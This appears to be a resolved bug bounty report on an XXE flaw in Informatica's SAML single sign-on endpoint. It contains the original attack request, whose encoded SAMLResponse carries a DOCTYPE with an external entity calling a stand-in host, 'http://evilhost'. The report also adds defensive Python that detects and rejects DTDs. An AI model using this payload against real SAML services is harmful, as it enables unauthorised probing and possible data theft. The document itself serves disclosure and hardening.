
[rev-app.informatica.com] - XXE via SAML

High
Informatica
Reported by yarbabin

Vulnerability Details

Technical details and impact analysis

Command Injection - Generic
Request (the form body is one line; the SAMLResponse value is shown as it appears in the report, with elided portions marked `[...]`):

```http
POST /sso HTTP/1.1
Host: rev-app.informatica.com
Connection: keep-alive
Content-Length: 8669
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://infapassport.okta.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://infapassport.okta.com/app/template_saml/kwtbgh4jLAZPMXLQUNMU/sso/saml
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4

SAMLResponse=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48IURPQ1RZUEUgZm9vIFsgPCFFTlRJVFkgJSBhc2QgU1lTVEVNICJodHRwOi8vZXZpbGhvc3QiPiAlYXNkO10%[...]%2BaHR0cDovL3d3dy5va3RhLmNvbS9rd3RiZ2g0akxBWlBNWExRVU5NVTwvc2FtbDI6SXNzdWVyPjxkczpTaWduYXR1cmUgeG1sbnM6ZHM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyMiPjxkczpTaWduZWRJbmZvPjxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8%2BPGRzOlNpZ25hdHVyZU1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNyc2Etc2hhMSIvPjxkczpSZWZlcmVuY2UgVVJJPSIjaWQyOTA5ODg2NzYyNzM5OTM1NDEyMDk2MjY1NSI%2BPGRzOlRyYW5zZm9ybXM%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNlbnZlbG9wZWQtc2lnbmF0dXJlIi8%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyI%2BPGVjOkluY2x1c2l2ZU5hbWVzcGFjZXMgeG1sbnM6ZWM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyIgUHJlZml4TGlzdD0ieHMiLz48L2RzOlRyYW5zZm9ybT48L2RzOlRyYW5zZm9ybXM%2BPGRzOkRpZ2VzdE1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNzaGExIi8%2BPGRzOkRpZ2VzdFZhbHVlPm9aV0EzYUVwRTdXeXhUUjdiRFllNDFieGVXaz08L2RzOkRpZ2VzdFZhbHVlPjwvZHM6UmVmZXJlbmNlPjwvZHM6U2lnbmVkSW5mbz48ZHM6U2lnbmF0dXJlVmFsdWU%2BZ0hwc0Z1aURmSE9ZOTkzY0IrVkRvdlQxNDg3T1U1Y1ZmTmxldlN3VXFiK3I5UTJGR00xWDFFczJNT2x1MXBudXQzU3V4dGNzcXU3OWdqb0ZvVW9RdGFnNllFNjhEdGtwR1d5S2RYUW1sZU9ZM0lkQ21NcGk4cFhXdnZJTnV2WDBiZHp6V1ZXTVlqTXplbDdPTFBXL0FZMDdETGl5ellkT0dYTmtKemlZcVZRPTwvZHM6U2lnbmF0dXJlVmFsdWU%2BPGRzOktleUluZm8%2BPGRzOlg1MDlEYXRhPjxkczpYNTA5Q2VydGlmaWNhdGU%[...]%2BaHR0cDovL3d3dy5va3RhLmNvbS9rd3RiZ2g0akxBWlBNWExRVU5NVTwvc2FtbDI6SXNzdWVyPjxkczpTaWduYXR1cmUgeG1sbnM6ZHM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyMiPjxkczpTaWduZWRJbmZvPjxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8%2BPGRzOlNpZ25hdHVyZU1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNyc2Etc2hhMSIvPjxkczpSZWZlcmVuY2UgVVJJPSIjaWQyOTA5ODg2NzYyNzQ3NjQxMzUwNDEzNDk3MiI%2BPGRzOlRyYW5zZm9ybXM%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNlbnZlbG9wZWQtc2lnbmF0dXJlIi8%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyI%2BPGVjOkluY2x1c2l2ZU5hbWVzcGFjZXMgeG1sbnM6ZWM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyIgUHJlZml4TGlzdD0ieHMiLz48L2RzOlRyYW5zZm9ybT48L2RzOlRyYW5zZm9ybXM%2BPGRzOkRpZ2VzdE1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNzaGExIi8%2BPGRzOkRpZ2VzdFZhbHVlPnYzMDhxcFZNZ3k0cTNIVk5BMmgyTmxzREE0OD08L2RzOkRpZ2VzdFZhbHVlPjwvZHM6UmVmZXJlbmNlPjwvZHM6U2lnbmVkSW5mbz48ZHM6U2lnbmF0dXJlVmFsdWU%2BUE5HMUllTXI2MGlkSUkvNFIrcWhSNXFzVUZVM05NYkRzOUFtTzdIZ0U2UFprMFg0VnJlbHJPTjRZeXkwdzY0dUhnQjUvQUpyRTREZ1YyOVV1Vi9NSmg4ZVByK1pRUlpRR09nZFphZTljcGM5VHBYZVRsWVF1T2dleVcyM25HZDRLeHBtK0ZkVU1aaldTY0pYditrYjQrQ2Q5eElmKzRCTDE5MnJ5elBEc1cwPTwvZHM6U2lnbmF0dXJlVmFsdWU%2BPGRzOktleUluZm8%2BPGRzOlg1MDlEYXRhPjxkczpYNTA5Q2VydGlmaWNhdGU%[...]%2BPHNhbWwyOkNvbmRpdGlvbnMgTm90QmVmb3JlPSIyMDE1LTEyLTI1VDEyOjQzOjMwLjY3M1oiIE5vdE9uT3JBZnRlcj0iMjAxNS0xMi0yNVQxMjo1MzozMC42NzNaIiB4bWxuczpzYW1sMj0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFzc2VydGlvbiI%2BPHNhbWwyOkF1ZGllbmNlUmVzdHJpY3Rpb24%2BPHNhbWwyOkF1ZGllbmNlPmh0dHBzOi8vcmV2LWFwcC5pbmZvcm1hdGljYS5jb20vc3NvPC9zYW1sMjpBdWRpZW5jZT48L3NhbWwyOkF1ZGllbmNlUmVzdHJpY3Rpb24%2BPC9zYW1sMjpDb25kaXRpb25zPjxzYW1sMjpBdXRoblN0YXRlbWVudCBBdXRobkluc3RhbnQ9IjIwMTUtMTItMjVUMTI6NDg6MzAuNjcyWiIgU2Vzc2lvbkluZGV4PSJpZDE0NTEwNDc3MTA2NzIuNjQ0NjAwMjU2IiB4bWxuczpzYW1sMj0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFzc2VydGlvbiI%2BPHNhbWwyOkF1dGhuQ29udGV4dD48c2FtbDI6QXV0aG5Db250ZXh0Q2xhc3NSZWY%2BdXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFjOmNsYXNzZXM6UGFzc3dvcmRQcm90ZWN0ZWRUcmFuc3BvcnQ8L3NhbWwyOkF1dGhuQ29udGV4dENsYXNzUmVmPjwvc2FtbDI6QXV0aG5Db250ZXh0Pjwvc2FtbDI6QXV0aG5TdGF0ZW1lbnQ%2BPHNhbWwyOkF0dHJpYnV0ZVN0YXRlbWVudCB4bWxuczpzYW1sMj0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFzc2VydGlvbiI%2BPHNhbWwyOkF0dHJpYnV0ZSBOYW1lPSJSb2xlIiBOYW1lRm9ybWF0PSJucyI%2BPHNhbWwyOkF0dHJpYnV0ZVZhbHVlIHhtbG5zOnhzPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYSIgeG1sbnM6eHNpPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYS1pbnN0YW5jZSIgeHNpOnR5cGU9InhzOnN0cmluZyI%2BYWxsPC9zYW1sMjpBdHRyaWJ1dGVWYWx1ZT48L3NhbWwyOkF0dHJpYnV0ZT48L3NhbWwyOkF0dHJpYnV0ZVN0YXRlbWVudD48L3NhbWwyOkFzc2VydGlvbj48L3NhbWwycDpSZXNwb25zZT4%3D&RelayState=
```

The SAMLResponse parameter is the SAML response XML, base64-encoded and then URL-encoded for the form body (this is the standard HTTP-POST binding). Decoding the leading part of the value shows that the XML prolog has been extended with an XXE payload:

`<!DOCTYPE foo [ <!ENTITY % asd SYSTEM "http://evilhost"> %asd;]>`

The DTD declares a parameter entity `asd` whose content is an external resource (`http://evilhost`) and references it immediately. A parser that processes DTDs and resolves external entities will fetch that URL while parsing the message. Because the DTD is processed during parsing, this happens before the service provider can validate the signature on the assertion, so the attacker does not need a valid signature for the payload to fire. The report demonstrates the out-of-band request to the attacker-controlled host, which is the indicator of a vulnerable parser; it does not show further exploitation such as file exfiltration.
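To make the mechanism concrete, the following added example (not part of the report and not Informatica's or Okta's code) shows how a service provider should handle the SAMLResponse form value before any XML reaches the real parser: decode the POST-binding encoding, look for a DOCTYPE with a stop-early expat handler, and refuse the message if one is present. A SAML message never legitimately carries a DTD, so rejecting any DOCTYPE outright (the same policy as defusedxml's `forbid_dtd`) closes this whole class of attack. The sample SAML message, its Issuer value and the use of the stdlib expat parser are assumptions made for the example; the XXE prolog is the one quoted in the report.

```python
import base64
import xml.etree.ElementTree as ET
import xml.parsers.expat
from urllib.parse import quote_plus, unquote_plus

# Constructed sample data: the XXE prolog quoted in the report, prepended to a
# minimal hypothetical (unsigned) SAML Response so the example runs offline.
XXE_PROLOG = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<!DOCTYPE foo [ <!ENTITY % asd SYSTEM "http://evilhost"> %asd;]>'
)
BENIGN_PROLOG = b'<?xml version="1.0" encoding="UTF-8"?>'
SAML_BODY = (
    b'<saml2p:Response xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" '
    b'Destination="https://rev-app.informatica.com/sso" ID="id1" Version="2.0">'
    b'<saml2:Issuer xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">'
    b'http://www.okta.com/example</saml2:Issuer>'  # hypothetical issuer
    b'</saml2p:Response>'
)


def encode_form_value(xml_bytes: bytes) -> str:
    """Build a SAMLResponse form value the way the HTTP-POST binding does:
    base64-encode the XML, then URL-encode it for the form body."""
    return quote_plus(base64.b64encode(xml_bytes).decode("ascii"))


def decode_form_value(value: str) -> bytes:
    """Reverse of encode_form_value: URL-decode, then base64-decode."""
    return base64.b64decode(unquote_plus(value))


class _DoctypeSeen(Exception):
    def __init__(self, info):
        super().__init__(info)
        self.info = info


def find_doctype(xml_bytes: bytes):
    """Return details of the DOCTYPE declaration if the document has one, else None.

    expat's start-doctype handler fires as soon as '<!DOCTYPE ...' has been read,
    before the internal subset (where the entity declarations live) is processed.
    Raising from the handler stops the parser there, so no entity is ever
    declared, expanded or fetched while we are only inspecting the document.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise _DoctypeSeen({
            "name": name,
            "system_id": system_id,
            "public_id": public_id,
            "internal_subset": bool(has_internal_subset),
        })

    parser.StartDoctypeDeclHandler = on_doctype
    try:
        parser.Parse(xml_bytes, True)
    except _DoctypeSeen as seen:
        return seen.info
    return None


def parse_saml_response(form_value: str) -> ET.Element:
    """Hardened decode-and-parse of a SAMLResponse form value.

    Any DOCTYPE is rejected before the document reaches the real parser or the
    signature-validation code, which is the point at which the XXE in the
    report would otherwise trigger.
    """
    xml_bytes = decode_form_value(form_value)
    doctype = find_doctype(xml_bytes)
    if doctype is not None:
        raise ValueError(f"DOCTYPE not allowed in SAML message: {doctype}")
    return ET.fromstring(xml_bytes)


if __name__ == "__main__":
    malicious = encode_form_value(XXE_PROLOG + SAML_BODY)
    print("doctype found:", find_doctype(decode_form_value(malicious)))
    try:
        parse_saml_response(malicious)
    except ValueError as err:
        print("rejected:", err)
    root = parse_saml_response(encode_form_value(BENIGN_PROLOG + SAML_BODY))
    print("accepted:", root.tag)
```

The check is deliberately placed on the decoded bytes rather than on the form value, since the DOCTYPE is invisible until after base64 decoding; a WAF rule on the raw POST body would only see base64.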

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Weakness

Command Injection - Generic